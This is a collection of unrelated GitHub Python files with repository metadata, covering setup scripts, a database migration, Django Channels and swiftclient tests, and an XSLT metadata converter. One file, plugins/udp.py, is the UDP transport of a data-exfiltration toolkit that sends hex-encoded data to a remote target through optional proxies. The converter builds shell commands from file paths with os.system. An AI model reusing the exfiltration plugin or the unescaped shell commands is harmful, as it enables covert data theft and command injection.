"bytes": "195501"
},
{
"name": "Objective-C",
"bytes": "15182"
},
{
"name": "Perl",
"bytes": "110166"
},
{
"name": "Python",
"bytes": "705967"
},
{
"name": "Shell",
"bytes": "119499"
},
{
"name": "Vim script",
"bytes": "192"
},
{
"name": "Yacc",
"bytes": "3255"
},
{
"name": "sed",
"bytes": "131"
}
],
"symlink_target": ""
} |
"""
Setup file for TimeseriesDB.
This file was generated with PyScaffold 2.5.6, a tool that easily
puts up a scaffold for your new Python project. Learn more under:
http://pyscaffold.readthedocs.org/
"""
import sys
from setuptools import setup
def setup_package():
needs_sphinx = {'build_sphinx', 'upload_docs'}.intersection(sys.argv)
sphinx = ['sphinx'] if needs_sphinx else []
setup(setup_requires=['six', 'pyscaffold>=2.5a0,<2.6a0'] + sphinx,
use_pyscaffold=True)
if __name__ == "__main__":
setup_package()
| {
"content_hash": "cc5a156b386ae50118bc20c17be529b5",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 73,
"avg_line_length": 26.571428571428573,
"alnum_prop": 0.6612903225806451,
"repo_name": "slac207/cs207project",
"id": "4cb277b4c5b8a27d0fc777a76d49ae0c3904bf9c",
"size": "604",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "TimeseriesDB/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1416"
},
{
"name": "HTML",
"bytes": "4380"
},
{
"name": "JavaScript",
"bytes": "135139"
},
{
"name": "Jupyter Notebook",
"bytes": "59899"
},
{
"name": "Python",
"bytes": "274063"
},
{
"name": "Shell",
"bytes": "10378"
}
],
"symlink_target": ""
} |
import socket
import sys
from random import choice
config = None
app_exfiltrate = None
def send(data):
if config.has_key('proxies') and config['proxies'] != [""]:
targets = [config['target']] + config['proxies']
target = choice(targets)
else:
target = config['target']
port = config['port']
app_exfiltrate.log_message(
'info', "[udp] Sending {0} bytes to {1}".format(len(data), target))
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.sendto(data.encode('hex'), (target, port))
def listen():
sniff(handler=app_exfiltrate.retrieve_data)
def sniff(handler):
port = config['port']
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
server_address = ('', port)
sock.bind(server_address)
app_exfiltrate.log_message(
'info', "[udp] Starting server on port {}...".format(port))
except socket.error as e:
app_exfiltrate.log_message(
'warning', "[udp] Couldn't bind on port {}...".format(port))
sys.exit(-1)
while True:
app_exfiltrate.log_message('info', "[udp] Waiting for connections...")
try:
while True:
data, client_address = sock.recvfrom(65535)
app_exfiltrate.log_message(
'info', "[udp] client connected: {}".format(client_address))
if data:
app_exfiltrate.log_message(
'info', "[udp] Received {} bytes".format(len(data)))
try:
data = data.decode('hex')
#app_exfiltrate.retrieve_data(data)
handler(data)
except Exception as e:
app_exfiltrate.log_message(
'warning', "[udp] Failed decoding message {}".format(e))
else:
break
finally:
pass
def relay_dns_packet(data):
target = config['target']
port = config['port']
app_exfiltrate.log_message(
'info', "[proxy] [udp] Relaying {0} bytes to {1}".format(len(data), target))
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.sendto(data.encode('hex'), (target, port))
def proxy():
app_exfiltrate.log_message(
'info', "[proxy] [udp] Listening for udp packets")
sniff(handler=relay_dns_packet)
class Plugin:
def __init__(self, app, conf):
global config
global app_exfiltrate
config = conf
app_exfiltrate = app
app.register_plugin('udp', {'send': send, 'listen': listen, 'proxy': proxy})
| {
"content_hash": "c801ec13a19fb62cb9396611ed0d36e3",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 84,
"avg_line_length": 33.407407407407405,
"alnum_prop": 0.5554323725055432,
"repo_name": "chokepoint/DET",
"id": "8b0b1da45b863911e86735208e6225e234a19914",
"size": "2706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/udp.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "18354"
},
{
"name": "PowerShell",
"bytes": "11831"
},
{
"name": "Python",
"bytes": "74290"
}
],
"symlink_target": ""
} |
"""empty message
Revision ID: 272e7cd352f9
Revises: 2e825c2c80c7
Create Date: 2016-01-19 19:57:57.224831
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '272e7cd352f9'
down_revision = '2e825c2c80c7'
def upgrade():
op.add_column('workflow', sa.Column('result', sa.Text))
def downgrade():
op.drop_column('workflow', 'result')
| {
"content_hash": "8407d3a7881060a330c2ee7992bcecc8",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 59,
"avg_line_length": 18.761904761904763,
"alnum_prop": 0.7233502538071066,
"repo_name": "stackforge/solum",
"id": "fdc93138d40f5262742eee8ec90435bfd929f6ad",
"size": "941",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "solum/objects/sqlalchemy/migration/alembic_migrations/versions/272e7cd352f9_add_result_column_to_workflow_table.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "958"
},
{
"name": "Python",
"bytes": "1243294"
},
{
"name": "Shell",
"bytes": "80784"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import os
from datetime import datetime
from itertools import islice
from django.http import FileResponse, HttpResponse, HttpResponseRedirect, JsonResponse, StreamingHttpResponse
from six import BytesIO
from channels import Channel
from channels.handler import AsgiHandler
from channels.test import ChannelTestCase
class FakeAsgiHandler(AsgiHandler):
"""
Handler subclass that just returns a premade response rather than
go into the view subsystem.
"""
chunk_size = 30
def __init__(self, response):
assert isinstance(response, (HttpResponse, StreamingHttpResponse))
self._response = response
super(FakeAsgiHandler, self).__init__()
def get_response(self, request):
return self._response
class HandlerTests(ChannelTestCase):
"""
Tests that the handler works correctly and round-trips things into a
correct response.
"""
def test_basic(self):
"""
Tests a simple request
"""
# Make stub request and desired response
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = HttpResponse(b"Hi there!", content_type="text/plain")
# Run the handler
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
# Make sure we got the right number of messages
self.assertEqual(len(reply_messages), 1)
reply_message = reply_messages[0]
# Make sure the message looks correct
self.assertEqual(reply_message["content"], b"Hi there!")
self.assertEqual(reply_message["status"], 200)
self.assertEqual(reply_message.get("more_content", False), False)
self.assertEqual(
reply_message["headers"],
[
(b"Content-Type", b"text/plain"),
],
)
def test_cookies(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = HttpResponse(b"Hi there!", content_type="text/plain")
response.set_signed_cookie('foo', '1', expires=datetime.now())
# Run the handler
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
# Make sure we got the right number of messages
self.assertEqual(len(reply_messages), 1)
reply_message = reply_messages[0]
# Make sure the message looks correct
self.assertEqual(reply_message["content"], b"Hi there!")
self.assertEqual(reply_message["status"], 200)
self.assertEqual(reply_message.get("more_content", False), False)
self.assertEqual(reply_message["headers"][0], (b'Content-Type', b'text/plain'))
self.assertIn('foo=', reply_message["headers"][1][1].decode())
def test_headers(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = HttpResponse(b"Hi there!", content_type="text/plain")
response['foo'] = 1
response['bar'] = 1
del response['bar']
del response['nonexistant_key']
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
# Make sure we got the right number of messages
self.assertEqual(len(reply_messages), 1)
reply_message = reply_messages[0]
# Make sure the message looks correct
self.assertEqual(reply_message["content"], b"Hi there!")
header_dict = dict(reply_messages[0]['headers'])
self.assertEqual(header_dict[b'foo'].decode(), '1')
self.assertNotIn('bar', header_dict)
def test_large(self):
"""
Tests a large response (will need chunking)
"""
# Make stub request and desired response
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = HttpResponse(
b"Thefirstthirtybytesisrighthereandhereistherest")
# Run the handler
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
# Make sure we got the right number of messages
self.assertEqual(len(reply_messages), 2)
# Make sure the messages look correct
self.assertEqual(reply_messages[0][
"content"], b"Thefirstthirtybytesisrighthere")
self.assertEqual(reply_messages[0]["status"], 200)
self.assertEqual(reply_messages[0]["more_content"], True)
self.assertEqual(reply_messages[1]["content"], b"andhereistherest")
self.assertEqual(reply_messages[1].get("more_content", False), False)
def test_empty(self):
"""
Tests an empty response
"""
# Make stub request and desired response
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = HttpResponse(b"", status=304)
# Run the handler
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True))
)
# Make sure we got the right number of messages
self.assertEqual(len(reply_messages), 1)
# Make sure the messages look correct
self.assertEqual(reply_messages[0].get("content", b""), b"")
self.assertEqual(reply_messages[0]["status"], 304)
self.assertEqual(reply_messages[0]["more_content"], False)
def test_empty_streaming(self):
"""
Tests an empty streaming response
"""
# Make stub request and desired response
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = StreamingHttpResponse([], status=304)
# Run the handler
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True))
)
# Make sure we got the right number of messages
self.assertEqual(len(reply_messages), 1)
# Make sure the messages look correct
self.assertEqual(reply_messages[0].get("content", b""), b"")
self.assertEqual(reply_messages[0]["status"], 304)
self.assertEqual(reply_messages[0]["more_content"], False)
def test_chunk_bytes(self):
"""
Makes sure chunk_bytes works correctly
"""
# Empty string should still return one chunk
result = list(FakeAsgiHandler.chunk_bytes(b""))
self.assertEqual(len(result), 1)
self.assertEqual(result[0][0], b"")
self.assertEqual(result[0][1], True)
# Below chunk size
result = list(FakeAsgiHandler.chunk_bytes(
b"12345678901234567890123456789"))
self.assertEqual(len(result), 1)
self.assertEqual(result[0][0], b"12345678901234567890123456789")
self.assertEqual(result[0][1], True)
# Exactly chunk size
result = list(FakeAsgiHandler.chunk_bytes(
b"123456789012345678901234567890"))
self.assertEqual(len(result), 1)
self.assertEqual(result[0][0], b"123456789012345678901234567890")
self.assertEqual(result[0][1], True)
# Just above chunk size
result = list(FakeAsgiHandler.chunk_bytes(
b"123456789012345678901234567890a"))
self.assertEqual(len(result), 2)
self.assertEqual(result[0][0], b"123456789012345678901234567890")
self.assertEqual(result[0][1], False)
self.assertEqual(result[1][0], b"a")
self.assertEqual(result[1][1], True)
def test_iterator(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = HttpResponse(range(10))
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
self.assertEqual(len(reply_messages), 1)
self.assertEqual(reply_messages[0]["content"], b"0123456789")
def test_streaming_data(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = StreamingHttpResponse('Line: %s' % i for i in range(10))
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
self.assertEqual(len(reply_messages), 11)
self.assertEqual(reply_messages[0]["content"], b"Line: 0")
self.assertEqual(reply_messages[9]["content"], b"Line: 9")
def test_real_file_response(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
current_dir = os.path.realpath(os.path.join(
os.getcwd(), os.path.dirname(__file__)))
response = FileResponse(
open(os.path.join(current_dir, 'a_file'), 'rb'))
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
self.assertEqual(len(reply_messages), 2)
self.assertEqual(response.getvalue(), b'')
def test_bytes_file_response(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = FileResponse(BytesIO(b'sadfdasfsdfsadf'))
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
self.assertEqual(len(reply_messages), 2)
def test_string_file_response(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = FileResponse('abcd')
handler = FakeAsgiHandler(response)
reply_messages = list(
handler(self.get_next_message("test", require=True)))
self.assertEqual(len(reply_messages), 5)
def test_non_streaming_file_response(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = FileResponse(BytesIO(b'sadfdasfsdfsadf'))
# This is to test the exception handling. This would only happening if
# the StreamingHttpResponse was incorrectly subclassed.
response.streaming = False
handler = FakeAsgiHandler(response)
with self.assertRaises(AttributeError):
list(handler(self.get_next_message("test", require=True)))
def test_unclosable_filelike_object(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
# This is a readable object that cannot be closed.
class Unclosable:
def read(self, n=-1):
# Nothing to see here
return b""
response = FileResponse(Unclosable())
handler = FakeAsgiHandler(response)
reply_messages = list(islice(handler(self.get_next_message("test", require=True)), 5))
self.assertEqual(len(reply_messages), 1)
response.close()
def test_json_response(self):
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = JsonResponse({'foo': (1, 2)})
handler = FakeAsgiHandler(response)
reply_messages = list(handler(self.get_next_message("test", require=True)))
self.assertEqual(len(reply_messages), 1)
self.assertEqual(reply_messages[0]['content'], b'{"foo": [1, 2]}')
def test_redirect(self):
for redirect_to in ['/', '..', 'https://example.com']:
Channel("test").send({
"reply_channel": "test",
"http_version": "1.1",
"method": "GET",
"path": b"/test/",
})
response = HttpResponseRedirect(redirect_to)
handler = FakeAsgiHandler(response)
reply_messages = list(handler(self.get_next_message("test", require=True)))
self.assertEqual(reply_messages[0]['status'], 302)
header_dict = dict(reply_messages[0]['headers'])
self.assertEqual(header_dict[b'Location'].decode(), redirect_to)
| {
"content_hash": "02fbd9fc1bb58ca51c052eb5fd781ba8",
"timestamp": "",
"source": "github",
"line_count": 355,
"max_line_length": 109,
"avg_line_length": 37.859154929577464,
"alnum_prop": 0.5759672619047619,
"repo_name": "Krukov/channels",
"id": "ffecf8bb7910ee947e9b4982f03c9b4c48035558",
"size": "13440",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_handler.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "30339"
},
{
"name": "Makefile",
"bytes": "424"
},
{
"name": "Python",
"bytes": "252412"
}
],
"symlink_target": ""
} |
"""
This module provides methods to read the configuration file,
process the referenced resources and
"""
import argparse
import codecs
import os
import subprocess
import yaml
import cmdiresource
import cmdiheader
from lxml import etree
PARSER = argparse.ArgumentParser()
PARSER.add_argument(
'resources',
help='a file containing paths of a resource (corpus, event, speaker) to transform'
)
def main():
"""
Main Method for dgd to cmdi transformation
:return:
"""
args = PARSER.parse_args()
with codecs.open(args.resources, mode='r', encoding='utf-8') as resfile:
resources = yaml.safe_load(resfile)
# start transformation with resource references
transform(resources)
def transform_par(processor, stylesheets, collection, transcripts, outputinter, outputfinal):
"""
starts transformation by using command line parameters and not a config file
:param processor:
:param stylesheets:
:param collection:
:param transcripts:
:param outputinter:
:param outputfinal:
:return:
"""
outputinter_corpus = os.path.join(outputinter, 'corpora')
outputinter_events = os.path.join(outputinter, 'events')
outputinter_speakers = os.path.join(outputinter, 'speakers')
# create folders for intermediate results if neccessary
if not os.path.isdir(outputinter_corpus):
os.makedirs(outputinter_corpus)
elif not os.path.isdir(outputinter_events):
os.makedirs(outputinter_events)
elif not os.path.isdir(outputinter_speakers):
os.makedirs(outputinter_speakers)
# create folders for final results if neccessary
if not os.path.isdir(outputfinal):
os.makedirs(outputfinal)
for resource in collection:
corpus_inpath = collection.get(resource).get('corpus')
events_inpath = collection.get(resource).get('event')
speakers_inpath = collection.get(resource).get('speaker')
outputfolder_corpus = outputinter_corpus
outputfolder_event = prepare_cpath(outputinter_events, resource)
outputfolder_speaker = prepare_cpath(outputinter_speakers, resource)
event_iterator = FileIterator(events_inpath, 'event')
speaker_iterator = FileIterator(speakers_inpath, 'speaker')
call_processor(corpus_inpath, 'corpus', stylesheets, processor,
outputfolder_corpus)
for event_resourcefile in event_iterator:
call_processor(event_resourcefile, 'event', stylesheets, processor,
outputfolder_event)
for speaker_resourcefile in speaker_iterator:
call_processor(speaker_resourcefile, 'speaker', stylesheets,
processor, outputfolder_speaker)
print "xslt transformation for {} finished.".format(resource)
finalize_resources(outputinter_corpus, outputinter_events,
outputinter_speakers, transcripts, outputfinal)
def transform(resources):
"""
calls the processor and refers to all resources
given in the configuration file.
"""
# define vars from samples file
processor = resources['processor']
stylesheets = resources['stylesheets']
collection = resources['collection']
transcripts = resources['transcripts']
outputinter = resources['output-inter']
outputinter_corpus = os.path.join(outputinter, 'corpora')
outputinter_events = os.path.join(outputinter, 'events')
outputinter_speakers = os.path.join(outputinter, 'speakers')
# create folders for intermediate results if neccessary
if not os.path.isdir(outputinter_corpus):
os.makedirs(outputinter_corpus)
elif not os.path.isdir(outputinter_events):
os.makedirs(outputinter_events)
elif not os.path.isdir(outputinter_speakers):
os.makedirs(outputinter_speakers)
outputfinal = resources['output-final']
# create folders for final results if neccessary
if not os.path.isdir(outputfinal):
os.makedirs(outputfinal)
for resource in collection:
corpus_inpath = collection.get(resource).get('corpus')
events_inpath = collection.get(resource).get('event')
speakers_inpath = collection.get(resource).get('speaker')
outputfolder_corpus = outputinter_corpus
outputfolder_event = prepare_cpath(outputinter_events, resource)
outputfolder_speaker = prepare_cpath(outputinter_speakers, resource)
event_iterator = FileIterator(events_inpath, 'event')
speaker_iterator = FileIterator(speakers_inpath, 'speaker')
call_processor(corpus_inpath, 'corpus', stylesheets, processor,
outputfolder_corpus)
for event_resourcefile in event_iterator:
call_processor(event_resourcefile, 'event', stylesheets, processor,
outputfolder_event)
for speaker_resourcefile in speaker_iterator:
call_processor(speaker_resourcefile, 'speaker', stylesheets,
processor, outputfolder_speaker)
print "xslt transformation for {} finished.".format(resource)
finalize_resources(outputinter_corpus, outputinter_events,
outputinter_speakers, transcripts, outputfinal)
def call_inline_processor(metafilepath, resourcetype, stylesheetdic, processor,
outputpath):
"""
transforms resources inline by using
subprocess and parsing the returncode
with etree.
returns a dictionary with filename key and etree value
"""
metafilepath = os.path.abspath(metafilepath)
processor = os.path.abspath(processor)
converts = {}
if resourcetype == 'corpus':
stylesheetpath = os.path.abspath(stylesheetdic.get('corpus'))
outputpath = os.path.abspath(outputpath)
command = "java -jar {} -s:{} -xsl:{}".format(processor, metafilepath,
stylesheetpath)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
converts.update({
os.path.basename(metafilepath): etree.parse(process.stdout)
})
return converts
elif resourcetype == 'event':
stylesheetpath = os.path.abspath(stylesheetdic.get('event'))
outputpath = os.path.abspath(outputpath)
command = "java -jar {} -s:{} -xsl:{}".format(processor, metafilepath,
stylesheetpath)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
converts.update({
os.path.basename(metafilepath): etree.parse(process.stdout)
})
return converts
elif resourcetype == 'speaker':
stylesheetpath = os.path.abspath(stylesheetdic.get('speaker'))
outputpath = os.path.abspath(outputpath)
command = "java -jar {} -s:{} -xsl:{}".format(processor, metafilepath,
stylesheetpath)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
converts.update({
os.path.basename(metafilepath): etree.parse(process.stdout)
})
return converts
else:
raise ValueError()
def call_processor(metafilepath, resourcetype, stylesheetdic, processor,
outputpath):
"""
calls the xslt processor for one resource instance.
"""
metafilepath = os.path.abspath(metafilepath)
processor = os.path.abspath(processor)
if resourcetype == 'corpus':
stylesheetpath = os.path.abspath(stylesheetdic.get('corpus'))
outputpath = os.path.abspath(outputpath)
os.system("java -jar {} -s:{} -xsl:{} -o:{}".format(
processor, metafilepath, stylesheetpath,
os.path.join(outputpath,
os.path.basename(metafilepath).split('.')[0] +
'.cmdi')))
elif resourcetype == 'event':
stylesheetpath = os.path.abspath(stylesheetdic.get('event'))
outputpath = os.path.abspath(outputpath)
# for resource in os.listdir(metafilepath):
os.system("java -jar {} -s:{} -xsl:{} -o:{}".format(
processor,
os.path.join(metafilepath), stylesheetpath,
os.path.join(outputpath,
os.path.basename(metafilepath).split('.')[0] +
'.cmdi')))
elif resourcetype == 'speaker':
stylesheetpath = os.path.abspath(stylesheetdic.get('speaker'))
outputpath = os.path.abspath(outputpath)
# os.path.join(outputpath, os.path.basename(metafilepath)))
# for resource in os.listdir(metafilepath):
os.system("java -jar {} -s:{} -xsl:{} -o:{}".format(
processor,
os.path.join(metafilepath), stylesheetpath,
os.path.join(outputpath,
os.path.basename(metafilepath).split('.')[0] +
'.cmdi')))
else:
raise ValueError()
def finalize_resources(corpus, event, speaker, transcripts, finaldir):
"""The final step adding resource proxies, cmdi headers and speaker
informations in event metafiles.
"""
# define corpuslabels
clabels = [fn.split('_')[0] for fn in os.listdir(corpus)]
# build resource tree
print "building resource tree..."
restree = cmdiresource.ResourceTreeCollection(corpus, event, speaker,
transcripts)
counter = 0
# create ids
for node in restree.nodes_iter():
corpuslabel = node.split('_')[0]
restree.node.get(node).update({'id': corpuslabel + '_' + str(counter)})
counter += 1
# build resource-proxies for documents
print "defining resource proxies..."
restree.build_resourceproxy()
# define is-part relations
print "building part relations..."
for nodename in restree.nodes_iter():
if restree.node.get(nodename).get('type') == 'event':
restree.define_parts(nodename)
elif restree.node.get(nodename).get('type') == 'corpus':
restree.define_parts(nodename)
# merge speaker info to events
print "merging speaker data to events..."
for nodename, ndata in restree.nodes_iter(data=True):
if ndata.get('type') == 'speaker':
restree.speaker2event(nodename)
# write cmdi etrees to files
for cl in clabels:
print "writing finalized cmdi files for {}".format(cl)
write2cmdi(restree, cl, finaldir)
# -------------------------------
# helper methods and classes
# -------------------------------
def prepare_cpath(outfolder, cname):
"""
creates a valid path to a resource collection
named after the corpus label.
"""
if not os.path.isdir(os.path.join(outfolder, cname)):
os.makedirs(os.path.join(outfolder, cname))
return os.path.join(outfolder, cname)
def write2cmdi(restree, corpus, outpath):
if not os.path.isdir(os.path.abspath(os.path.join(outpath, corpus))):
os.mkdir(os.path.join(outpath, corpus))
outpathfinal = os.path.abspath(os.path.join(outpath, corpus))
for nodename, ndata in restree.nodes_iter(data=True):
if ndata.get('type') == 'event' and ndata.get('corpus') == corpus:
cmdiheader.define_header(nodename, restree)
restree._write_cmdi(nodename, os.path.join(
outpathfinal, nodename) + '.cmdi')
elif ndata.get('type') == 'corpus' and ndata.get('corpus') == corpus:
cmdiheader.define_header(nodename, restree)
restree._write_cmdi(nodename, os.path.join(
outpathfinal, nodename) + '.cmdi')
class FileIterator(object):
"""
Iterator is initialized with a corpus path.
either returns files or, in case of event and speaker,
the corpus label directories
"""
def __init__(self, resourcepath, resourcetype):
self.resourcepath = os.path.abspath(resourcepath)
self.resourcetype = resourcetype
self._files_iter = iter(os.listdir(self.resourcepath))
def __iter__(self):
return self
def next(self):
"""
next element.
"""
file_name = self._files_iter.next()
return os.path.join(self.resourcepath, file_name)
| {
"content_hash": "256e747a4a10b0a9d56a3c6f94c69dd7",
"timestamp": "",
"source": "github",
"line_count": 360,
"max_line_length": 93,
"avg_line_length": 34.522222222222226,
"alnum_prop": 0.6338107499195366,
"repo_name": "fkuhn/dgd2cmdi",
"id": "54b434aa452e5937a4904961616edb45986efa0a",
"size": "12428",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/dgd2cmdi/dgd2cmdi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "63662"
},
{
"name": "XSLT",
"bytes": "55246"
}
],
"symlink_target": ""
} |
from os import path
from . import path
from .. import path
from ..foo import path
from os import path as shmath
import os
import sys, os
import os.path
import os.path as path2
import os.path, dir.foo
| {
"content_hash": "95fc166cb31fb7453ed15b08d3983fe7",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 29,
"avg_line_length": 20,
"alnum_prop": 0.765,
"repo_name": "rocky/python-spark",
"id": "9b0ff6f43071395079a9284577996e78cb657bf4",
"size": "819",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "example/python2/test/parse/imports.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3365"
},
{
"name": "Makefile",
"bytes": "1967"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "171292"
},
{
"name": "Shell",
"bytes": "3576"
}
],
"symlink_target": ""
} |
from setuptools import find_packages, setup
def with_versioneer(f, default=None):
"""Attempts to execute the supplied single-arg function by passing it
versioneer if available; else, returns the default.
"""
try:
import versioneer
return f(versioneer)
except ModuleNotFoundError:
return default
def readme():
try:
with open('README.md') as f:
return f.read()
except Exception:
return None
CASFS_VERSION = "0.1.0"
REQUIRED_PACKAGES = [
"casfs==0.1.1",
"fs",
"fs-gcsfs",
"mlflow==1.10.0",
"numpy>=1.18.0",
"sqlalchemy",
"tqdm>=4.42.1",
"google-cloud-pubsub>=1.7.0",
]
setup(name='uv-metrics',
version=with_versioneer(lambda v: v.get_version()),
cmdclass=with_versioneer(lambda v: v.get_cmdclass(), {}),
description='Composable metric reporters in Python.',
long_description=readme(),
long_description_content_type="text/markdown",
python_requires='>=3.6.0',
author='Sam Ritchie',
author_email='samritchie@google.com',
url='https://github.com/google/uv-metrics',
license='Apache-2.0',
packages=find_packages(exclude=('tests', 'docs')),
install_requires=REQUIRED_PACKAGES,
extras_require={
"tf": ["tensorflow"],
"tf-gpu": ["tensorflow-gpu"],
},
include_package_data=True,
entry_points={
'console_scripts': [
'mlflow_subscriber = uv.resources.mlflow_subscriber:main',
]
})
| {
"content_hash": "4d108341a000a53268630e7c4e7b005f",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 72,
"avg_line_length": 25.896551724137932,
"alnum_prop": 0.6158455392809588,
"repo_name": "google/uv-metrics",
"id": "fca1e1711ba4abfa5030393001017641c41c013f",
"size": "2097",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1632"
},
{
"name": "Python",
"bytes": "247575"
}
],
"symlink_target": ""
} |
from neutron_lib.api.definitions import subnet_onboard
from neutron_lib.tests.unit.api.definitions import base
class OnboardSubnetDefinitionTestCase(base.DefinitionBaseTestCase):
extension_module = subnet_onboard
extension_attributes = ()
| {
"content_hash": "8142ff81b604e18a2aa8350d56e491d8",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 67,
"avg_line_length": 35.57142857142857,
"alnum_prop": 0.8152610441767069,
"repo_name": "openstack/neutron-lib",
"id": "5fd4240c4ad378c5ac9688e80d3b33ef49df75e9",
"size": "822",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neutron_lib/tests/unit/api/definitions/test_subnet_onboard.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "3459"
},
{
"name": "HTML",
"bytes": "31248"
},
{
"name": "Python",
"bytes": "1522390"
},
{
"name": "Shell",
"bytes": "6100"
}
],
"symlink_target": ""
} |
import functools
import io
import importlib
import os
import sys
from time import sleep
import unittest
from unittest import mock
from requests import RequestException
from requests.structures import CaseInsensitiveDict
from urllib.parse import urlparse, ParseResult
from swiftclient import client as c
from swiftclient import shell as s
from swiftclient.utils import EMPTY_ETAG
def fake_get_auth_keystone(expected_os_options=None, exc=None,
storage_url='http://url/', token='token',
**kwargs):
def fake_get_auth_keystone(auth_url,
user,
key,
actual_os_options, **actual_kwargs):
if exc:
raise exc('test')
# TODO: some way to require auth_url, user and key?
if expected_os_options:
for key, value in actual_os_options.items():
if value and value != expected_os_options.get(key):
return "", None
if 'required_kwargs' in kwargs:
for k, v in kwargs['required_kwargs'].items():
if v != actual_kwargs.get(k):
return "", None
if auth_url.startswith("https") and \
auth_url.endswith("invalid-certificate") and \
not actual_kwargs['insecure']:
from swiftclient import client as c
raise c.ClientException("invalid-certificate")
if auth_url.startswith("https") and \
auth_url.endswith("self-signed-certificate") and \
not actual_kwargs['insecure'] and \
actual_kwargs['cacert'] is None:
from swiftclient import client as c
raise c.ClientException("unverified-certificate")
if auth_url.startswith("https") and \
auth_url.endswith("client-certificate") and \
not (actual_kwargs['cert'] and actual_kwargs['cert_key']):
from swiftclient import client as c
raise c.ClientException("noclient-certificate")
return storage_url, token
return fake_get_auth_keystone
class StubResponse(object):
"""
Placeholder structure for use with fake_http_connect's code_iter to modify
response attributes (status, body, headers) on a per-request basis.
"""
def __init__(self, status=200, body='', headers=None):
self.status = status
self.body = body
self.headers = headers or {}
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__, self.status,
self.body, self.headers)
def fake_http_connect(*code_iter, **kwargs):
"""
Generate a callable which yields a series of stubbed responses. Because
swiftclient will reuse an HTTP connection across pipelined requests it is
not always the case that this fake is used strictly for mocking an HTTP
connection, but rather each HTTP response (i.e. each call to requests
get_response).
"""
class FakeConn(object):
def __init__(self, status, etag=None, body='', timestamp='1',
headers=None):
self.status_code = self.status = status
self.reason = 'Fake'
self.scheme = 'http'
self.host = '1.2.3.4'
self.port = '1234'
self.sent = 0
self.received = 0
self.etag = etag
self.content = self.body = body
self.timestamp = timestamp
self.headers = headers or {}
self.request = None
self._closed = False
def getresponse(self):
if kwargs.get('raise_exc'):
raise Exception('test')
return self
def getheaders(self):
if self.headers:
return self.headers.items()
